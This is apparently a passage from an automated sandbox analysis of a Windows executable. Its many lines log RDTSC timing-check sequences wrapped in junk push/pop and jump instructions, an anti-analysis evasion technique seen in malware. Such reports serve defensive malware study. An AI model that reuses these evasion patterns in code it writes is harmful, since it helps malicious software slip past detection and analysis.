Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D02E9A second address: D02E9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D02E9E second address: D02EA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D02EA4 second address: D02EA9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D02EA9 second address: D02EAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0313D second address: D03143 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D03143 second address: D03149 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D03149 second address: D03151 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D03151 second address: D0319B instructions: 0x00000000 rdtsc 0x00000002 jp 00007FC4E87CE376h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007FC4E87CE37Ch 0x00000010 jng 00007FC4E87CE376h 0x00000016 pop eax 0x00000017 pop edx 0x00000018 pop eax 0x00000019 pushad 0x0000001a pushad 0x0000001b push edx 0x0000001c pop edx 0x0000001d pushad 0x0000001e popad 0x0000001f pushad 0x00000020 popad 0x00000021 jnc 00007FC4E87CE376h 0x00000027 popad 0x00000028 jmp 00007FC4E87CE37Eh 0x0000002d push ecx 0x0000002e push edx 0x0000002f pop edx 0x00000030 pop ecx 0x00000031 pushad 0x00000032 js 00007FC4E87CE376h 0x00000038 push eax 0x00000039 push edx 0x0000003a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0347A second address: D0347E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D03FEF second address: D04029 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 pop eax 0x00000009 popad 0x0000000a jmp 00007FC4E87CE381h 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FC4E87CE387h 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D04029 second address: D04039 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FC4E9056F56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d pushad 0x0000000e popad 0x0000000f pop edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D04039 second address: D0404E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC4E87CE37Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0A14D second address: D0A155 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0A155 second address: D0A15B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0A15B second address: D0A160 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0D24D second address: D0D251 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0D3DA second address: D0D3EE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jc 00007FC4E9056F56h 0x0000000e jp 00007FC4E9056F56h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0D68B second address: D0D6B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC4E87CE388h 0x00000009 pushad 0x0000000a jbe 00007FC4E87CE376h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0D6B0 second address: D0D6E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FC4E9056F66h 0x00000013 jmp 00007FC4E9056F62h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0D6E6 second address: D0D6FA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC4E87CE380h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0D857 second address: D0D85B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0D85B second address: D0D885 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FC4E87CE381h 0x0000000f jmp 00007FC4E87CE37Fh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0D885 second address: D0D88F instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FC4E9056F56h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0D9F3 second address: D0DA0B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC4E87CE37Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 jng 00007FC4E87CE376h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D15F62 second address: D15F7C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC4E9056F66h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D15F7C second address: D15F9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FC4E87CE389h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D1410F second address: D1412C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC4E9056F67h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D1412C second address: D14131 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D14810 second address: D14814 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D1499F second address: D149A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D149A4 second address: D149AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D149AC second address: D149B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D149B4 second address: D149BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D14AEB second address: D14AEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D14AEF second address: D14B07 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC4E9056F64h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D14CB3 second address: D14CB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D13C96 second address: D13C9A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C656D4 second address: C656ED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC4E87CE383h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C656ED second address: C656F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FC4E9056F56h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C656F7 second address: C656FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D1EAEA second address: D1EAEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D1EC40 second address: D1EC44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D1EC44 second address: D1EC58 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jp 00007FC4E9056F56h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c js 00007FC4E9056F5Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D1EC58 second address: D1EC82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 push edx 0x00000006 pop edx 0x00000007 pop ecx 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007FC4E87CE37Dh 0x00000017 popad 0x00000018 pushad 0x00000019 push edi 0x0000001a pop edi 0x0000001b jbe 00007FC4E87CE376h 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D1EC82 second address: D1EC95 instructions: 0x00000000 rdtsc 0x00000002 je 00007FC4E9056F5Eh 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D2CC76 second address: D2CC92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 je 00007FC4E87CE3A7h 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FC4E87CE37Fh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D2CC92 second address: D2CC96 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D2CE2A second address: D2CE3D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c jno 00007FC4E87CE376h 0x00000012 pop edi 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D2EEC8 second address: D2EEE6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC4E9056F64h 0x00000009 jc 00007FC4E9056F56h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D2EEE6 second address: D2EEF8 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jnl 00007FC4E87CE376h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D2EEF8 second address: D2EF14 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 je 00007FC4E9056F56h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d jmp 00007FC4E9056F5Eh 0x00000012 pop esi 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D3188B second address: D3189F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pushad 0x00000006 popad 0x00000007 pushad 0x00000008 popad 0x00000009 jc 00007FC4E87CE376h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D3189F second address: D318A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D318A3 second address: D318B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c jne 00007FC4E87CE376h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D3F986 second address: D3F98C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D3F98C second address: D3F9A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC4E87CE380h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D3F9A0 second address: D3F9AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D3F9AA second address: D3F9AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D3F9AE second address: D3F9BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FC4E9056F56h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D3F9BA second address: D3F9C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D3F9C0 second address: D3F9C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D46E0C second address: D46E12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D46E12 second address: D46E51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a jmp 00007FC4E9056F61h 0x0000000f ja 00007FC4E9056F5Ah 0x00000015 popad 0x00000016 jc 00007FC4E9056F6Eh 0x0000001c push ebx 0x0000001d push edi 0x0000001e pop edi 0x0000001f push ecx 0x00000020 pop ecx 0x00000021 pop ebx 0x00000022 push eax 0x00000023 jmp 00007FC4E9056F5Ah 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D45B11 second address: D45B23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop esi 0x00000008 push eax 0x00000009 push edx 0x0000000a js 00007FC4E87CE37Eh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D45B23 second address: D45B2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D45B2D second address: D45B48 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC4E87CE387h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D4C1CD second address: D4C1DB instructions: 0x00000000 rdtsc 0x00000002 jo 00007FC4E9056F56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D4C1DB second address: D4C1E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FC4E87CE376h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D4C1E5 second address: D4C1EB instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D4C1EB second address: D4C216 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 push edx 0x00000006 pop edx 0x00000007 pop edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FC4E87CE385h 0x0000000f jmp 00007FC4E87CE37Ch 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D4BD53 second address: D4BD57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D4BEAC second address: D4BEBF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC4E87CE37Dh 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D5333B second address: D53373 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FC4E9056F63h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jne 00007FC4E9056F56h 0x00000012 jmp 00007FC4E9056F67h 0x00000017 pop eax 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D5A467 second address: D5A46D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C58049 second address: C58053 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FC4E9056F5Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D692F6 second address: D6930A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FC4E87CE37Bh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D6930A second address: D69339 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC4E9056F60h 0x00000009 jmp 00007FC4E9056F60h 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 ja 00007FC4E9056F56h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D6C348 second address: D6C362 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC4E87CE384h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D6BF17 second address: D6BF2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC4E9056F5Ch 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D6BF2C second address: D6BF30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D6BF30 second address: D6BF34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D6C0C0 second address: D6C0CB instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jnc 00007FC4E87CE376h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D7C2B3 second address: D7C2B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D7C2B9 second address: D7C2DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC4E87CE385h 0x00000009 push edx 0x0000000a pop edx 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e je 00007FC4E87CE376h 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D7C2DF second address: D7C301 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FC4E9056F56h 0x00000008 jmp 00007FC4E9056F68h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D7C301 second address: D7C32D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jmp 00007FC4E87CE385h 0x0000000a pop ebx 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FC4E87CE37Dh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D7C32D second address: D7C333 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D7C333 second address: D7C337 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D7B1E4 second address: D7B209 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007FC4E9056F68h 0x0000000c jmp 00007FC4E9056F62h 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D7B209 second address: D7B21C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007FC4E87CE37Dh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D7B21C second address: D7B237 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC4E9056F66h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D7B4E5 second address: D7B51A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FC4E87CE37Ah 0x0000000b popad 0x0000000c pushad 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f jnp 00007FC4E87CE376h 0x00000015 pushad 0x00000016 popad 0x00000017 jmp 00007FC4E87CE388h 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D7B51A second address: D7B526 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007FC4E9056F56h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D7B526 second address: D7B52A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D7B6C8 second address: D7B6CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D7B6CC second address: D7B6D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D7BCEF second address: D7BCF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FC4E9056F56h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D7BFBE second address: D7BFC4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D7BFC4 second address: D7BFCA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
